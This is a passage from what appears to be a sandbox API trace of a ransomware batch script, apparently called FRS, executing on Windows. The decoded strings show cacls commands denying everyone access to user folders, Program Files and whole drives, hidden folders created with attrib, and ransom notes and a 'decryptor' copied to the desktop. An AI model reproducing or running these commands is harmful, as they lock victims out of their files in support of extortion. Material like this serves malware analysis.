lpDistanceToMoveHigh=0x0) returned 0x29d [0120.195] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.195] GetFileType (hFile=0x24c) returned 0x1 [0120.195] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0120.195] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0120.195] SetFilePointer (in: hFile=0x24c, lDistanceToMove=736, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0120.195] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=67, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Saved Games\\*.*\" /e /d everyone\r\n=%%i\r\n") returned 67 [0120.195] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0120.195] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.195] GetFileType (hFile=0x24c) returned 0x1 [0120.195] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0120.195] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0120.195] SetFilePointer (in: hFile=0x24c, lDistanceToMove=797, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0120.195] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=61, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Links\\*.*\" /e /d everyone\r\nyone\r\n") returned 61 [0120.195] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0120.196] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.196] GetFileType (hFile=0x24c) returned 0x1 [0120.196] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0120.196] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0120.196] SetFilePointer (in: hFile=0x24c, lDistanceToMove=862, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0120.196] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=65, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Favorites\\*.*\" /e /d everyone\r\n\r\n") returned 65 [0120.196] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0120.196] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.196] GetFileType (hFile=0x24c) returned 0x1 [0120.196] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0120.196] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0120.196] SetFilePointer (in: hFile=0x24c, lDistanceToMove=926, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0120.196] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=64, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Searches\\*.*\" /e /d everyone\r\n\n") returned 64 [0120.196] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0120.196] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.196] GetFileType (hFile=0x24c) returned 0x1 [0120.196] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0120.196] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0120.196] SetFilePointer (in: hFile=0x24c, lDistanceToMove=988, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0120.196] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=62, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Videos\\*.*\" /e /d everyone\r\n\r\n") returned 62 [0120.196] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0120.196] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.196] GetFileType (hFile=0x24c) returned 0x1 [0120.196] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0120.196] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0120.196] SetFilePointer (in: hFile=0x24c, lDistanceToMove=1052, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0120.196] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=64, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Pictures\\*.*\" /e /d everyone\r\n") returned 64 [0120.196] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0120.196] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.196] GetFileType (hFile=0x24c) returned 0x1 [0120.196] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0120.197] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0120.197] SetFilePointer (in: hFile=0x24c, lDistanceToMove=1103, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0120.197] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=51, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\Public\\*.*\" /e /d everyone\r\n/d everyone\r\n") returned 51 [0120.197] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0120.197] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.197] GetFileType (hFile=0x24c) returned 0x1 [0120.197] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0120.197] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0120.197] SetFilePointer (in: hFile=0x24c, lDistanceToMove=1155, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0120.197] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=52, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Program Files\\*.*\" /e /d everyone\r\nd everyone\r\n") returned 52 [0120.197] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0120.197] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.197] GetFileType (hFile=0x24c) returned 0x1 [0120.197] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0120.197] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0120.197] SetFilePointer (in: hFile=0x24c, lDistanceToMove=1193, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0120.197] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\*.*\" /e /d everyone\r\n /d everyone\r\n") returned 38 [0120.197] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0120.197] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.197] GetFileType (hFile=0x24c) returned 0x1 [0120.197] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0120.197] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0120.197] SetFilePointer (in: hFile=0x24c, lDistanceToMove=1231, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0120.197] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"D:\\*.*\" /e /d everyone\r\n") returned 38 [0120.197] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0120.197] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.198] GetFileType (hFile=0x24c) returned 0x1 [0120.198] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0120.198] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0120.198] SetFilePointer (in: hFile=0x24c, lDistanceToMove=1269, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0120.198] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"E:\\*.*\" /e /d everyone\r\n") returned 38 [0120.198] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0120.198] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.198] GetFileType (hFile=0x24c) returned 0x1 [0120.198] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0120.198] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0120.198] SetFilePointer (in: hFile=0x24c, lDistanceToMove=1307, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0120.198] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"F:\\*.*\" /e /d everyone\r\n") returned 38 [0120.198] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0120.198] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.198] GetFileType (hFile=0x24c) returned 0x1 [0120.198] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0120.198] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0120.198] SetFilePointer (in: hFile=0x24c, lDistanceToMove=1315, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0120.198] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 3\r\nacls \"F:\\*.*\" /e /d everyone\r\n") returned 8 [0120.198] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0120.198] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.198] GetFileType (hFile=0x24c) returned 0x1 [0120.198] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0120.198] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0120.198] SetFilePointer (in: hFile=0x24c, lDistanceToMove=1317, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0120.198] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 3\r\n") returned 2 [0120.198] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0120.198] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.198] GetFileType (hFile=0x24c) returned 0x1 [0120.198] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0120.199] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0120.199] SetFilePointer (in: hFile=0x24c, lDistanceToMove=1321, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0120.199] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":3\r\n 3\r\n") returned 4 [0120.199] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0120.199] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.199] GetFileType (hFile=0x24c) returned 0x1 [0120.199] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0120.199] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0120.199] SetFilePointer (in: hFile=0x24c, lDistanceToMove=1342, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0120.199] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=21, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="md C:\\FRSRAMSOMWARE\r\n /e /d everyone\r\n") returned 21 [0120.199] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0120.199] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.199] GetFileType (hFile=0x24c) returned 0x1 [0120.199] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0120.199] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0120.199] SetFilePointer (in: hFile=0x24c, lDistanceToMove=1379, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0120.199] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="attrib +s +a +h +r C:\\FRSRAMSOMWARE\r\n\n") returned 37 [0120.199] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0120.199] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.199] GetFileType (hFile=0x24c) returned 0x1 [0120.199] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0120.199] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0120.199] SetFilePointer (in: hFile=0x24c, lDistanceToMove=1395, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0120.199] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=16, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="md C:\\FRS_TEMP\r\n+r C:\\FRSRAMSOMWARE\r\n") returned 16 [0120.199] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0120.199] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.199] GetFileType (hFile=0x24c) returned 0x1 [0120.199] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0120.199] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0120.199] SetFilePointer (in: hFile=0x24c, lDistanceToMove=1427, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0120.200] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=32, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="attrib +s +a +h +r C:\\FRS_TEMP\r\nARE\r\n") returned 32 [0120.200] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0120.200] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.200] GetFileType (hFile=0x24c) returned 0x1 [0120.200] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0120.200] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0120.200] SetFilePointer (in: hFile=0x24c, lDistanceToMove=1462, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0120.200] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo.encrypt>C:\\FRS_TEMP\\temp.txt\r\n\r\n") returned 35 [0120.200] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0120.200] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.200] GetFileType (hFile=0x24c) returned 0x1 [0120.200] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0120.200] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0120.200] SetFilePointer (in: hFile=0x24c, lDistanceToMove=1542, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0120.200] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=80, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\FRS_Decryptor.exe C:\\Users\\%username%\\Desktop\\FRS_Decryptor.exe\r\npng\r\n") returned 80 [0120.200] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0120.200] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.200] GetFileType (hFile=0x24c) returned 0x1 [0120.200] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0120.200] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0120.200] SetFilePointer (in: hFile=0x24c, lDistanceToMove=1626, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0120.200] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=84, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.png C:\\Users\\%username%\\Desktop\\READ_ME_HELP_ME.png\r\n\n") returned 84 [0120.200] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0120.200] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.200] GetFileType (hFile=0x24c) returned 0x1 [0120.200] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0120.200] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0120.200] SetFilePointer (in: hFile=0x24c, lDistanceToMove=1710, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0120.200] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=84, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.txt C:\\Users\\%username%\\Desktop\\READ_ME_HELP_ME.txt\r\n") returned 84 [0120.200] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0120.201] _get_osfhandle (_FileHandle=3) returned 0x24c [0120.201] GetFileType (hFile=0x24c) returned 0x1 [0120.201] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: 